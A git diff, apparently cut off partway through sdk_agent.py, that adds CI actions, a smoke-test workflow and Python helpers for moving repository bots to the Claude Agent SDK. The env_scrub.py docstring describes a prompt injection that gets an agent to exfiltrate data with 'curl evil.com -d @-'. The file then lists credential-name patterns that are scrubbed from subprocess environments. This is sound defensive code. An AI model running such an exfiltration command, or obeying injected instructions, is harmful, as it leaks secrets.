diff --git a/.github/actions/setup-claude-sdk/action.yml b/.github/actions/setup-claude-sdk/action.yml
new file mode 100644
index 000000000..392404491
--- /dev/null
+++ b/.github/actions/setup-claude-sdk/action.yml
@@ -0,0 +1,54 @@
+# Copyright (c) 2025 ADBC Drivers Contributors
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+
+# Install the Claude Agent SDK (pip) + the Claude Code CLI (npm) that the bots
+# now spawn, via Databricks' internal JFrog mirror. The protected runner group
+# is egress-blocked from pypi.org and registry.npmjs.org, so this configures
+# both package managers through JFrog (same mechanism as setup-jfrog / the
+# sdk-smoke workflow, which is verified working end-to-end against the gateway).
+#
+# Requires `id-token: write` on the calling job (for the JFrog OIDC exchange).
+# Idempotent w.r.t. a prior setup-jfrog step (re-exchanging the token + re-
+# setting PIP_INDEX_URL is harmless).
+name: Setup Claude Agent SDK
+description: Install claude-agent-sdk (pip) + Claude Code CLI (npm) via the internal JFrog mirror.
+
+inputs:
+  requirements-file:
+    description: >-
+      Path to the SDK requirements file, relative to the job working directory
+      ($GITHUB_WORKSPACE — composite `run:` steps always execute there, not at
+      the caller's working-directory). Defaults to scripts/requirements-sdk.txt,
+      correct when the repo is checked out at the workspace root (e.g. the
+      reviewer bots). Workflows that check the repo into a subdir (the engineer
+      bots use `path: internal-repo`) MUST pass the prefixed path, e.g.
+      internal-repo/scripts/requirements-sdk.txt.
+    required: false
+    default: scripts/requirements-sdk.txt
+
+runs:
+  using: composite
+  steps:
+    - name: Setup Node (for the Claude Code CLI the SDK spawns)
+      uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4.4.0
+      with:
+        node-version: '20'
+
+    - name: Configure JFrog (pip + npm internal mirror)
+      uses: ./.github/actions/setup-jfrog
+      with:
+        configure-pip: 'true'
+        configure-npm: 'true'
+
+    - name: Install claude-agent-sdk + Claude Code CLI
+      shell: bash
+      run: |
+        python -m pip install --upgrade pip
+        # Install the SDK from the documented requirements file (not a bare
+        # `pip install claude-agent-sdk`) so CI and local docs share one
+        # dependency source and future pins land in a single place. (Review)
+        pip install -r "${{ inputs.requirements-file }}"
+        npm i -g @anthropic-ai/claude-code
+        echo "claude CLI: $(command -v claude || echo 'NOT FOUND')"
diff --git a/.github/actions/setup-jfrog/setup-jfrog/action.yml b/.github/actions/setup-jfrog/setup-jfrog/action.yml
new file mode 100644
index 000000000..8b6bf290f
--- /dev/null
+++ b/.github/actions/setup-jfrog/setup-jfrog/action.yml
@@ -0,0 +1,78 @@
+name: Setup JFrog OIDC
+description: Obtain a JFrog access token via GitHub OIDC and configure package managers
+
+inputs:
+  configure-pip:
+    description: Configure pip to use JFrog PyPI proxy
+    default: "true"
+  configure-cargo:
+    description: Configure Cargo to use JFrog crates proxy
+    default: "false"
+  configure-npm:
+    description: Configure npm to use JFrog npm proxy
+    default: "false"
+
+runs:
+  using: composite
+  steps:
+    - name: Get JFrog OIDC token
+      shell: bash
+      run: |
+        set -euo pipefail
+        ID_TOKEN=$(curl -sLS \
+          -H "User-Agent: actions/oidc-client" \
+          -H "Authorization: Bearer $ACTIONS_ID_TOKEN_REQUEST_TOKEN" \
+          "${ACTIONS_ID_TOKEN_REQUEST_URL}&audience=jfrog-github" | jq .value | tr -d '"')
+        echo "::add-mask::${ID_TOKEN}"
+        ACCESS_TOKEN=$(curl -sLS -XPOST -H "Content-Type: application/json" \
+          "https://databricks.jfrog.io/access/api/v1/oidc/token" \
+          -d "{\"grant_type\": \"urn:ietf:params:oauth:grant-type:token-exchange\", \"subject_token_type\":\"urn:ietf:params:oauth:token-type:id_token\", \"subject_token\": \"${ID_TOKEN}\", \"provider_name\": \"github-actions\"}" | jq .access_token | tr -d '"')
+        echo "::add-mask::${ACCESS_TOKEN}"
+        if [ -z "$ACCESS_TOKEN" ] || [ "$ACCESS_TOKEN" = "null" ]; then
+          echo "FAIL: Could not extract JFrog access token"
+          exit 1
+        fi
+        echo "JFROG_ACCESS_TOKEN=${ACCESS_TOKEN}" >> "$GITHUB_ENV"
+        echo "JFrog OIDC token obtained successfully"
+
+    - name: Configure pip
+      if: inputs.configure-pip == 'true'
+      shell: bash
+      run: |
+        set -euo pipefail
+        echo "PIP_INDEX_URL=https://gha-service-account:${JFROG_ACCESS_TOKEN}@databricks.jfrog.io/artifactory/api/pypi/db-pypi/simple" >> "$GITHUB_ENV"
+        echo "pip configured to use JFrog registry"
+
+    - name: Configure Cargo
+      if: inputs.configure-cargo == 'true'
+      shell: bash
+      run: |
+        set -euo pipefail
+        mkdir -p ~/.cargo
+        cat > ~/.cargo/config.toml << EOF
+        [source.crates-io]
+        replace-with = "jfrog"
+        [source.jfrog]
+        registry = "sparse+https://databricks.jfrog.io/artifactory/api/cargo/db-cargo-remote/index/"
+        [registries.jfrog]
+        index = "sparse+https://databricks.jfrog.io/artifactory/api/cargo/db-cargo-remote/index/"
+        credential-provider = ["cargo:token"]
+        EOF
+        cat > ~/.cargo/credentials.toml << EOF
+        [registries.jfrog]
+        token = "Bearer ${JFROG_ACCESS_TOKEN}"
+        EOF
+        echo "CARGO_REGISTRIES_JFROG_TOKEN=Bearer ${JFROG_ACCESS_TOKEN}" >> "$GITHUB_ENV"
+        echo "Cargo configured to use JFrog registry"
+
+    - name: Configure npm
+      if: inputs.configure-npm == 'true'
+      shell: bash
+      run: |
+        set -euo pipefail
+        cat > ~/.npmrc << EOF
+        registry=https://databricks.jfrog.io/artifactory/api/npm/db-npm/
+        //databricks.jfrog.io/artifactory/api/npm/db-npm/:_authToken=${JFROG_ACCESS_TOKEN}
+        always-auth=true
+        EOF
+        echo "npm configured to use JFrog registry"
diff --git a/.github/workflows/sdk-smoke.yml b/.github/workflows/sdk-smoke.yml
new file mode 100644
index 000000000..516a70915
--- /dev/null
+++ b/.github/workflows/sdk-smoke.yml
@@ -0,0 +1,39 @@
+# Reviewer-bot foundation smoke test.
+#
+# Manual-only (workflow_dispatch). Verifies the one infra unknown for the
+# reviewer-bot foundation on this repo: that the Claude Agent SDK (pip) + the
+# Claude Code CLI (npm) install on the protected runner via Databricks' internal
+# JFrog mirror (the runner group is egress-blocked from pypi.org/npmjs.org).
+# No secrets required — only the JFrog OIDC token exchange (id-token: write).
+name: SDK Smoke (reviewer-bot foundation)
+
+on:
+  workflow_dispatch:
+
+permissions:
+  contents: read
+  id-token: write   # JFrog OIDC token exchange for the internal pip/npm mirror
+
+jobs:
+  smoke:
+    runs-on:
+      group: databricks-protected-runner-group
+      labels: [linux-ubuntu-latest]
+    timeout-minutes: 15
+    steps:
+      - name: Checkout
+        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+
+      - name: Setup Python
+        uses: actions/setup-python@a309ff8b426b58ec0e2a45f0f869d46889d02405 # v6.2.0
+        with:
+          python-version: '3.11'
+
+      - name: Setup Claude Agent SDK + CLI
+        uses: ./.github/actions/setup-claude-sdk
+
+      - name: Verify SDK + CLI are importable/spawnable
+        run: |
+          python -c "import claude_agent_sdk; print('claude_agent_sdk import OK')"
+          echo "claude CLI: $(command -v claude || echo 'NOT FOUND')"
+          claude --version || true
diff --git a/scripts/__init__.py b/scripts/__init__.py
new file mode 100644
index 000000000..e69de29bb
diff --git a/scripts/requirements-sdk.txt b/scripts/requirements-sdk.txt
new file mode 100644
index 000000000..a77900b59
--- /dev/null
+++ b/scripts/requirements-sdk.txt
@@ -0,0 +1,23 @@
+# Claude Agent SDK migration dependencies (PoC).
+#
+# Replaces the hand-rolled LLM transport + tool-use loop
+# (scripts/engineer_bot/agent_runner.py, scripts/shared/llm_client.py)
+# with the Claude Agent SDK. See docs/migration/claude-agent-sdk-migration.md.
+#
+# IMPORTANT: the SDK spawns the Claude Code CLI under the hood. The CLI
+# must be on PATH in any environment that calls sdk_agent.run_agent
+# (CI runners + local dev). Install it once, globally, via npm:
+#
+#     npm i -g @anthropic-ai/claude-code
+#
+# The CLI is NOT a pip package; it cannot be pinned here. CI workflows
+# (engineer-bot.yml, reviewer-bot.yml, *-followup.yml) must add an install
+# + npm-cache step before invoking any bot that uses the SDK.
+#
+# Endpoint config (set by sdk_agent.configure_databricks_env at runtime,
+# derived from the existing MODEL_ENDPOINT / DATABRICKS_TOKEN workflow env):
+#     ANTHROPIC_BASE_URL   = <workspace>/serving-endpoints/anthropic
+#     ANTHROPIC_AUTH_TOKEN = $DATABRICKS_TOKEN     # NOT ANTHROPIC_API_KEY
+#     ANTHROPIC_MODEL      = databricks-claude-opus-4-8
+
+claude-agent-sdk
diff --git a/scripts/shared/__init__.py b/scripts/shared/__init__.py
new file mode 100644
index 000000000..e69de29bb
diff --git a/scripts/shared/env_scrub.py b/scripts/shared/env_scrub.py
new file mode 100644
index 000000000..4cf318020
--- /dev/null
+++ b/scripts/shared/env_scrub.py
@@ -0,0 +1,52 @@
+"""Strip credential-shaped env vars before exec'ing subprocesses.
+
+Canonical home for the env-scrub regex table (relocated here from
+``scripts/engineer_bot/env_scrub.py`` during the Claude Agent SDK migration,
+PR1). The shared SDK modules (``sdk_agent``, ``sdk_security``) import from
+here so they carry NO dependency on ``engineer_bot``; ``engineer_bot/env_scrub``
+is now a thin re-export shim, so PR6 can delete that shim as a pure deletion
+without touching this load-bearing table.
+
+The bash tool inherits the workflow's env which contains DATABRICKS_TOKEN,
+GitHub App tokens, etc. Subprocesses launched by the agent must not see
+these — a malicious prompt injection that gets the agent to `curl
+evil.com -d @-` then read from stdin can't exfiltrate what isn't there.
+"""
+from __future__ import annotations
+
+import re
+
+_REDACT_PATTERNS = (
+    re.compile(r".*TOKEN.*", re.IGNORECASE),
+    re.compile(r".*SECRET.*", re.IGNORECASE),
+    re.compile(r".*PASSWORD.*", re.IGNORECASE),
+    re.compile(r".*API_KEY.*", re.IGNORECASE),
+    # Broader patterns covering cloud credential conventions that
+    # don't include the four magic substrings above.
+    re.compile(r".*PRIVATE.*", re.IGNORECASE),
+    re.compile(r".*CREDENTIAL.*", re.IGNORECASE),
+    re.compile(r".*OAUTH.*", re.IGNORECASE),
+    re.compile(r".*ACCESS_KEY.*", re.IGNORECASE),
+    re.compile(r".*SECRET_KEY.*", re.IGNORECASE),
+    # Specific named vars that don't match the substring patterns
+    # above. NOTE: we deliberately do NOT use blanket prefix patterns
+    # like `^DATABRICKS_.*`, `^AWS_.*`, `^AZURE_.*` — those would
+    # strip non-credential config vars (e.g. DATABRICKS_TEST_CONFIG_FILE
+    # which the bash tool's dotnet-test invocation reads).
+    # DATABRICKS_TOKEN, DATABRICKS_OAUTH_CLIENT_SECRET etc. are caught
+    # by the substring patterns above.
+    re.compile(r"^AWS_ACCESS_KEY_ID$", re.IGNORECASE),
+    re.compile(r"^GOOGLE_APPLICATION_CREDENTIALS$", re.IGNORECASE),
+    re.compile(r"^KUBECONFIG$", re.IGNORECASE),
+    re.compile(r"^SSH_AUTH_SOCK$", re.IGNORECASE),
+    re.compile(r"^AZURE_TENANT_ID$", re.IGNORECASE),
+    re.compile(r"^AZURE_CLIENT_ID$", re.IGNORECASE),
+)
+
+
+def scrub(env: dict[str, str]) -> dict[str, str]:
+    """Return a new dict with credential-shaped keys removed."""
+    return {
+        k: v for k, v in env.items()
+        if not any(p.match(k) for p in _REDACT_PATTERNS)
+    }
diff --git a/scripts/shared/git_ops.py b/scripts/shared/git_ops.py
new file mode 100644
index 000000000..e829f44a6
--- /dev/null
+++ b/scripts/shared/git_ops.py
@@ -0,0 +1,83 @@
+"""Thin wrappers around `git` for bot workflows."""
+from __future__ import annotations
+
+import subprocess
+import sys
+from pathlib import Path
+from typing import Optional
+
+
+def configure_user(cwd: Path, email: str, name: str) -> None:
+    subprocess.run(["git", "config", "user.email", email], cwd=cwd, check=True)
+    subprocess.run(["git", "config", "user.name", name], cwd=cwd, check=True)
+
+
+def commit_paths(cwd: Path, paths: list[str], message: str) -> bool:
+    """Stage the given paths and create a commit. Returns False if nothing staged."""
+    subprocess.run(["git", "add", *paths], cwd=cwd, check=True)
+    diff = subprocess.run(["git", "diff", "--cached", "--quiet"], cwd=cwd)
+    if diff.returncode == 0:
+        return False  # nothing staged
+    if diff.returncode != 1:
+        # git diff --quiet documents 0 (no diff) / 1 (diff). Anything else
+        # is an error — fail loud rather than committing on a broken repo.
+        raise RuntimeError(
+            f"git diff --cached --quiet returned unexpected code {diff.returncode}; "
+            f"refusing to commit"
+        )
+    subprocess.run(["git", "commit", "-m", message], cwd=cwd, check=True)
+    return True
+
+
+def push(
+    cwd: Path,
+    branch: str,
+    remote: str = "origin",
+    *,
+    force_with_lease: bool = False,
+    expected_sha: Optional[str] = None,
+) -> None:
+    """Push a branch to `remote`.
+
+    Default is a plain push that fails on non-fast-forward.
+
+    `force_with_lease=True` without `expected_sha` is unsafe in CI
+    (background fetches by actions/checkout refresh the lease ref, so
+    the lease check degenerates to `--force`). When you need force-push
+    behavior, pass `expected_sha` — the lease will be qualified with
+    `<branch>:<expected>` so it actually protects against races.
+    """
+    if force_with_lease and not expected_sha:
+        # Fail loud rather than silently constructing the risky
+        # unqualified --force-with-lease command. Callers that really
+        # want to force-push must compute the expected remote SHA
+        # first (via `git ls-remote`) and pass it explicitly.
+        raise ValueError(
+            "push(force_with_lease=True) requires expected_sha. Unqualified "
+            "--force-with-lease degrades to --force in CI because background "
+            "fetches refresh the lease ref. Pass the expected remote SHA or "
+            "use a plain push."
+        )
+    cmd = ["git", "push", remote, branch]
+    if force_with_lease:
+        cmd.insert(2, f"--force-with-lease={branch}:{expected_sha}")
+    try:
+        r = subprocess.run(
+            cmd, cwd=cwd, check=True,
+            capture_output=True, text=True,
+        )
+    except subprocess.CalledProcessError as e:
+        # Re-raise with the captured stderr so callers can include it
+        # in their failure messages. Print to the workflow log first so
+        # the trace is visible even if the caller doesn't surface stderr.
+        if e.stdout:
+            print(e.stdout, end="")
+        if e.stderr:
+            print(e.stderr, end="", file=sys.stderr)
+        raise
+
+
+def current_sha(cwd: Path) -> str:
+    r = subprocess.run(["git", "rev-parse", "HEAD"], cwd=cwd,
+                       capture_output=True, text=True, check=True)
+    return r.stdout.strip()
diff --git a/scripts/shared/github_ops.py b/scripts/shared/github_ops.py
new file mode 100644
index 000000000..1bef0326f
--- /dev/null
+++ b/scripts/shared/github_ops.py
@@ -0,0 +1,73 @@
+"""Thin wrappers around the `gh` CLI for bot workflows.
+
+Auth comes from the GH_TOKEN env var that callers must set (usually
+to a GitHub App installation token). Network errors propagate.
+"""
+from __future__ import annotations
+
+import json
+import subprocess
+from typing import Any
+
+
+def _run_gh(*args: str, paginate: bool = False) -> str:
+    """Run `gh` with the given args, return stdout. On failure, raise
+    RuntimeError with stderr included so it shows up in workflow logs.
+    """
+    cmd = ["gh", *args]
+    if paginate:
+        # Insert --paginate after the subcommand (e.g. `gh api --paginate ...`)
+        cmd.insert(2, "--paginate")
+    try:
+        r = subprocess.run(cmd, capture_output=True, text=True, check=True)
+    except subprocess.CalledProcessError as e:
+        raise RuntimeError(
+            f"gh failed (exit {e.returncode}): {' '.join(cmd)}\n"
+            f"stderr: {e.stderr.strip()}"
+        ) from e
+    return r.stdout
+
+
+def fetch_pr(repo: str, pr_number: int) -> dict[str, Any]:
+    out = _run_gh(
+        "pr", "view", str(pr_number), "--repo", repo, "--json",
+        "title,body,url,headRefName,headRefOid,baseRefName,isCrossRepository",
+    )
+    return json.loads(out)
+
+
+def fetch_review_comment(repo: str, comment_id: int) -> dict[str, Any]:
+    out = _run_gh("api", f"repos/{repo}/pulls/comments/{comment_id}")
+    return json.loads(out)
+
+
+def list_pr_review_comments(repo: str, pr_number: int) -> list[dict[str, Any]]:
+    out = _run_gh("api", f"repos/{repo}/pulls/{pr_number}/comments", paginate=True)
+    return json.loads(out)
+
+
+def post_inline_reply(repo: str, pr_number: int, in_reply_to: int, body: str) -> int:
+    out = _run_gh(
+        "api", "-X", "POST",
+        f"repos/{repo}/pulls/{pr_number}/comments",
+        "-f", f"body={body}",
+        "-F", f"in_reply_to={in_reply_to}",
+    )
+    return json.loads(out)["id"]
+
+
+def post_pr_comment(repo: str, pr_number: int, body: str) -> int:
+    out = _run_gh(
+        "api", "-X", "POST",
+        f"repos/{repo}/issues/{pr_number}/comments",
+        "-f", f"body={body}",
+    )
+    return json.loads(out)["id"]
+
+
+def resolve_thread(repo: str, thread_id: str) -> None:
+    query = (
+        "mutation($id: ID!) { resolveReviewThread(input: {threadId: $id}) "
+        "{ thread { id isResolved } } }"
+    )
+    _run_gh("api", "graphql", "-f", f"query={query}", "-f", f"id={thread_id}")
diff --git a/scripts/shared/json_utils.py b/scripts/shared/json_utils.py
new file mode 100644
index 000000000..6a8c92220
--- /dev/null
+++ b/scripts/shared/json_utils.py
@@ -0,0 +1,118 @@
+"""JSON-extraction helpers for parsing LLM responses.
+
+Relocated from ``scripts/shared/llm_client.py`` as part of the Claude
+Agent SDK migration (see ``docs/migration/claude-agent-sdk-migration.md``,
+PR1). ``llm_client.py`` is gutted once every caller routes through the SDK;
+this parse helper survives because the SDK delivers tool-call args
+structured, but some response shapes (and the reviewer-bot ``finalize_review``
+fallback) still need brace-balanced JSON extraction from free text.
+
+``llm_client`` re-exports ``ParseError`` / ``extract_json_block`` from here
+so existing imports keep working unchanged.
+"""
+from __future__ import annotations
+
+import json
+from typing import Any
+
+
+class ParseError(ValueError):
+    """The model's response could not be parsed into a JSON object."""
+
+
+def extract_json_block(text: str) -> dict[str, Any]:
+    """Extract a JSON object from the model's response.
+
+    Robust against three common model behaviors:
+      - Pure JSON output (no prose, no fence).
+      - JSON wrapped in a ```json fence (legacy; the prompt no longer
+        requires fences, but the model may still add them).
+      - JSON containing nested ``` blocks inside string values (e.g.,
+        a `suggestion` field with a ```suggestion fenced code block).
+        Regex-based extraction breaks on this; brace-balancing does not.
+      - Multiple top-level JSON objects in the same response (e.g.,
+        the model echoes the schema example before emitting its
+        actual answer). The LAST balanced object is returned.
+
+    Raises ParseError if no parseable JSON object is found.
+    """
+    text = text.strip()
+    if not text:
+        raise ParseError("Empty response")
+
+    # Fast path: response is pure JSON.
+    try:
+        result = json.loads(text)
+        if isinstance(result, dict):
+            return result
+    except json.JSONDecodeError:
+        pass
+
+    # Slow path: scan for balanced top-level {…} regions and try each
+    # from last to first. String state is tracked so braces / backticks
+    # inside string values don't confuse the matcher.
+    candidates = _find_balanced_objects(text)
+    if not candidates:
+        raise ParseError("No parseable JSON object in response")
+
+    last_err: Exception | None = None
+    for start, end in reversed(candidates):
+        try:
+            obj = json.loads(text[start:end + 1])
+            if isinstance(obj, dict):
+                return obj
+        except json.JSONDecodeError as e:
+            last_err = e
+            continue
+    raise ParseError(
+        f"All {len(candidates)} candidate JSON blocks failed to parse: "
+        f"{last_err}"
+    )
+
+
+def _find_balanced_objects(text: str) -> list[tuple[int, int]]:
+    """Return (start, end) offsets of every balanced {…} region in text.
+    Tracks string state (with escape handling) so braces inside string
+    values do not affect depth.
+    """
+    out: list[tuple[int, int]] = []
+    i = 0
+    n = len(text)
+    while i < n:
+        if text[i] == "{":
+            end = _balanced_brace_end(text, i)
+            if end != -1:
+                out.append((i, end))
+                i = end + 1
+                continue
+        i += 1
+    return out
+
+
+def _balanced_brace_end(text: str, start: int) -> int:
+    """Return index of the matching '}' for the '{' at text[start], or
+    -1 if unbalanced. String state tracking ignores braces inside
+    JSON string literals (handles escaped quotes and backslashes)."""
+    depth = 0
+    in_string = False
+    escape = False
+    for i in range(start, len(text)):
+        ch = text[i]
+        if escape:
+            escape = False
+            continue
+        if in_string:
+            if ch == "\\":
+                escape = True
+            elif ch == '"':
+                in_string = False
+            continue
+        if ch == '"':
+            in_string = True
+        elif ch == "{":
+            depth += 1
+        elif ch == "}":
+            depth -= 1
+            if depth == 0:
+                return i
+    return -1
diff --git a/scripts/shared/llm_client.py b/scripts/shared/llm_client.py
new file mode 100644
index 000000000..b3b6258bc
--- /dev/null
+++ b/scripts/shared/llm_client.py
@@ -0,0 +1,21 @@
+"""Backwards-compat shim: JSON-extraction helpers relocated to json_utils.
+
+Historically this module held the hand-rolled Databricks Model Serving client
+(``call_llm``, OpenAI-format ``TOOLS_SCHEMA``) and the brace-balanced JSON
+extractor. The Claude Agent SDK migration removed the transport + tool schema
+— every caller now routes through ``scripts.shared.sdk_agent`` + the in-process
+``@tool`` servers — and the JSON helpers moved to
+``scripts/shared/json_utils.py``.
+
+This module survives ONLY as a re-export of ``ParseError`` /
+``extract_json_block`` so existing imports
+(`from scripts.shared.llm_client import extract_json_block`) keep working. New
+code should import from ``scripts.shared.json_utils`` directly.
+"""
+from __future__ import annotations
+
+# Re-exported for backwards compatibility; canonical home is json_utils.
+from scripts.shared.json_utils import (  # noqa: F401
+    ParseError,
+    extract_json_block,
+)
diff --git a/scripts/shared/markers.py b/scripts/shared/markers.py
new file mode 100644
index 000000000..27e3eaa10
--- /dev/null
+++ b/scripts/shared/markers.py
@@ -0,0 +1,75 @@
+"""Generic HTML marker builders for bot comments.
+
+Posting under `github-actions[bot]` is shared across all workflows in
+this repo. Markers disambiguate which bot a comment belongs to. Each
+bot picks a namespace ("reviewer-bot", "engineer-bot", etc.) and uses
+the helpers below.
+"""
+from __future__ import annotations
+
+import re
+
+_VERSION = "v1"
+
+_ID_ALLOWED = re.compile(r"[^A-Za-z0-9_.\-]")
+_ID_MAX_LEN = 40
+
+
+def _sanitize_id(value) -> str:
+    s = str(value) if value is not None else ""
+    s = _ID_ALLOWED.sub("", s)[:_ID_MAX_LEN]
+    return s or "unknown"
+
+
+def marker(namespace: str, kind: str) -> str:
+    return f"<!-- {namespace}:{_VERSION} {kind} -->"
+
+
+def marker_with_id(namespace: str, kind: str, id_value) -> str:
+    return f"<!-- {namespace}:{_VERSION} {kind} id={_sanitize_id(id_value)} -->"
+
+
+def has_marker(body: str, namespace: str, kind: str) -> bool:
+    """True iff `body` contains the exact marker on an unquoted line.
+
+    See `has_any_marker` for the rationale on the quoted-line filter
+    — the same false-positive applies to specific-kind matches."""
+    needle = marker(namespace, kind)
+    return _scan_unquoted_lines(body, needle)
+
+
+def has_any_marker(body: str, namespace: str) -> bool:
+    """True iff `body` contains an active marker for `namespace`.
+
+    "Active" means the marker appears on a line that is NOT a markdown
+    blockquote (lines beginning with `>`, optionally indented). When a
+    reviewer quotes a bot's prior reply via GitHub's blockquote syntax,
+    the quoted text — INCLUDING the trailing HTML-comment marker —
+    appears in the reviewer's reply body. A naive substring check
+    misclassifies that reviewer reply as bot-authored, which suppresses
+    re-engagement in `find_unaddressed_threads` and breaks the
+    own-reply loop guard in both bots' followup workflows.
+
+    Filtering out `>`-prefixed lines covers the common case. We do
+    NOT (yet) parse fenced code blocks (```...```); a marker inside a
+    code fence is rare in real reviewer text and the existing reply
+    cap bounds the damage even if it slipped through.
+    """
+    if not body:
+        return False
+    needle = f"<!-- {namespace}:{_VERSION}"
+    return _scan_unquoted_lines(body, needle)
+
+
+def _scan_unquoted_lines(body: str, needle: str) -> bool:
+    """Line-by-line substring scan that skips markdown blockquote
+    lines (`>` prefix, with optional leading whitespace). Shared
+    helper for `has_marker` and `has_any_marker`."""
+    if not body:
+        return False
+    for line in body.splitlines():
+        if line.lstrip().startswith(">"):
+            continue
+        if needle in line:
+            return True
+    return False
diff --git a/scripts/shared/sdk_agent.py b/scripts/shared/sdk_agent.py
new file mode 100644
index 000000000..0984de795
--- /dev/null
+++ b/scripts/shared/sdk_agent.py
@@ -0,0 +1,733 @@
+"""SDK-backed agent runner (proof-of-concept).
+
+Replaces the hand-rolled transport + tool-use loop in
+``scripts/engineer_bot/agent_runner.py`` (POST loop, 429/transient
+backoff, stop_reason contract) and ``scripts/shared/llm_client.call_llm``
+(the bespoke HTTP client) with the Claude Agent SDK
+(``claude_agent_sdk``). The SDK spawns the Claude Code CLI, which speaks
+the same Anthropic Messages protocol the bots already POST by hand.
+
+What this module preserves verbatim from ``agent_runner``:
+
+  * The ``AgentResult`` dataclass shape every caller depends on
+    (``transcript``, ``touched_files``, ``bash_invocations``,
+    ``final_text``, ``turns``, ``stop_reason``).
+  * The ``stop_reason`` contract: ``"end_turn"`` / ``"max_turns"`` /
+    ``"http_error_<code>"`` (``HTTP_ERROR_STOP_PREFIX`` re-exported so
+    ``csharp_coverage/initial.py``'s skip-retrospective check keeps
+    working).
+  * The LINEAR 30/60/90 -> 120s retry curve (we deliberately do NOT
+    trust the SDK's internal backoff; ``_with_linear_retry`` wraps the
+    whole run so the workflow-step timing contract survives).
+
+What moves to the SDK: transport, the request -> tool_use -> tool_result
+loop, and tool dispatch.
+
+Endpoint feasibility (verified against ``csharp_coverage/initial.py``
+``_translate_endpoint``): the SDK's CLI targets Databricks Model Serving
+via ``ANTHROPIC_BASE_URL`` (the translated ``.../serving-endpoints/
+anthropic`` base, to which the CLI appends ``/v1/messages``),
+``ANTHROPIC_AUTH_TOKEN`` (Bearer auth from ``DATABRICKS_TOKEN`` -- NOT
+``ANTHROPIC_API_KEY``), and ``ANTHROPIC_MODEL`` (model name in the
+request body).
+
+Imports of ``claude_agent_sdk`` are GUARDED: this module imports cleanly
+even when the SDK is absent (so unit tests for ``translate_endpoint`` /
+retry can run anywhere). The clear ImportError is raised only when
+``run_agent`` is actually called.
+"""
+from __future__ import annotations
+
+import asyncio
+import json
+import os
+import re
+import sys
+import time
+from dataclasses import dataclass, field
+from typing import Any, Awaitable, Callable, Optional
+
+# Reused for the env=None default in run_agent: scrub a copy of os.environ so
+# the SDK subprocess keeps PATH/HOME but loses credential-shaped vars (#5).
+# Canonical home is shared/ (no dependency on engineer_bot).
+from scripts.shared import env_scrub
+
+# ── Guarded SDK import ────────────────────────────────────────────────
+# Keep the module importable without the SDK installed; surface a clear
+# error only at run_agent() call time.
+try:  # pragma: no cover - exercised only where the SDK is installed
+    from claude_agent_sdk import (
+        ClaudeAgentOptions,
+        ClaudeSDKClient,
+    )
+
+    _SDK_IMPORT_ERROR: Optional[Exception] = None
+except Exception as _exc:  # noqa: BLE001 - any import failure is non-fatal here
+    ClaudeAgentOptions = None  # type: ignore[assignment]
+    ClaudeSDKClient = None  # type: ignore[assignment]
+    _SDK_IMPORT_ERROR = _exc
+
+
+# Stop-reason prefix emitted when an LLM-API call returns a non-2xx HTTP
+# status. Re-exported with the SAME literal as
+# ``agent_runner.HTTP_ERROR_STOP_PREFIX`` so consumers (notably
+# ``csharp_coverage/initial.py``, which skips the retrospective on
+# HTTP-error stops) detect HTTP-error stops without duplicating the
+# string. If you rename it, grep ``HTTP_ERROR_STOP_PREFIX`` /
+# ``http_error_`` across the repo first.
+HTTP_ERROR_STOP_PREFIX = "http_error_"
+
+# Databricks' Anthropic gateway rejects the Claude Code CLI's default
+# ``anthropic-beta`` flags with ``400 {"message":"invalid beta flag"}`` UNLESS
+# this header opts the request into the gateway's coding-agent mode. Confirmed
+# fix from the Model Serving team (Slack #ai-devtools, 2026-01-29) and mirrors
+# universe ``devtools/ai/llm-lib/agents/claudecode.py`` model-serving env. The
+# CLI forwards ``ANTHROPIC_CUSTOM_HEADERS`` ("Name: value") on every request.
+DATABRICKS_CODING_AGENT_HEADER = "x-databricks-use-coding-agent-mode: true"
+
+
+def _merge_coding_agent_header(env: dict[str, str]) -> None:
+    """Ensure ``ANTHROPIC_CUSTOM_HEADERS`` carries the coding-agent header
+    (with value ``true``), MERGING with any value a caller already set rather
+    than no-op'ing.
+
+    A plain ``setdefault`` would silently drop our header if the caller set
+    ``ANTHROPIC_CUSTOM_HEADERS`` for any other reason (tracing, etc.) — which
+    reproduces the exact ``400 invalid beta flag`` this header exists to fix.
+    The CLI parses multiple ``Name: value`` headers separated by newlines, so
+    we append ours when it isn't already present.
+
+    The presence check matches the full ``name: true`` header (not just the
+    name), so a caller who set ``...coding-agent-mode: false`` still gets the
+    ``: true`` opt-in appended rather than being treated as already-correct.
+    """
+    existing = (env.get("ANTHROPIC_CUSTOM_HEADERS") or "").strip()
+    if DATABRICKS_CODING_AGENT_HEADER.lower() in existing.lower():
+        return
+    env["ANTHROPIC_CUSTOM_HEADERS"] = (
+        f"{existing}\n{DATABRICKS_CODING_AGENT_HEADER}" if existing
+        else DATABRICKS_CODING_AGENT_HEADER
+    )
+
+
+@dataclass
+class AgentResult:
+    """Drop-in shape for ``agent_runner.AgentResult``.
+
+    Field names + semantics are identical so callers
+    (``csharp_coverage/initial.py``, ``followup.py``) need no changes
+    beyond the import site.
+    """
+
+    transcript: list[dict[str, Any]] = field(default_factory=list)
+    touched_files: list[str] = field(default_factory=list)
+    bash_invocations: list[dict[str, Any]] = field(default_factory=list)
+    final_text: str = ""
+    turns: int = 0
+    stop_reason: str = ""
+    # Tier-2: the schema-validated payload from ResultMessage.structured_output
+    # when the caller passes output_format=... to run_agent; None otherwise so
+    # existing (Tier-1) callers are unaffected.
+    structured_output: Optional[dict[str, Any]] = None
+    # Real per-run telemetry (replaces the reviewer observer's hardcoded
+    # 0/0/(none) placeholders). tool_calls = every ToolUseBlock name across the
+    # run; tokens + cost come from the terminal ResultMessage. All default to
+    # empty/0 so a run with no usage data (or the SDK absent in tests) is safe.
+    tool_calls: list[str] = field(default_factory=list)
+    prompt_tokens: int = 0
+    completion_tokens: int = 0
+    total_cost_usd: float = 0.0
+
+
+class _HttpError(Exception):
+    """Internal: an HTTP non-2xx surfaced by the SDK transport.
+
+    Carries the numeric status so ``run_agent`` can re-emit the
+    ``http_error_<code>`` stop_reason contract.
+    """
+
+    def __init__(self, code: int, detail: str = ""):
+        super().__init__(f"HTTP {code}: {detail}"[:300])
+        self.code = code
+
+
+def translate_endpoint(endpoint: str) -> str:
+    """Translate a v1 ``.../serving-endpoints/<model>/invocations`` URL
+    into the v2 ``.../serving-endpoints/anthropic`` base URL the SDK's
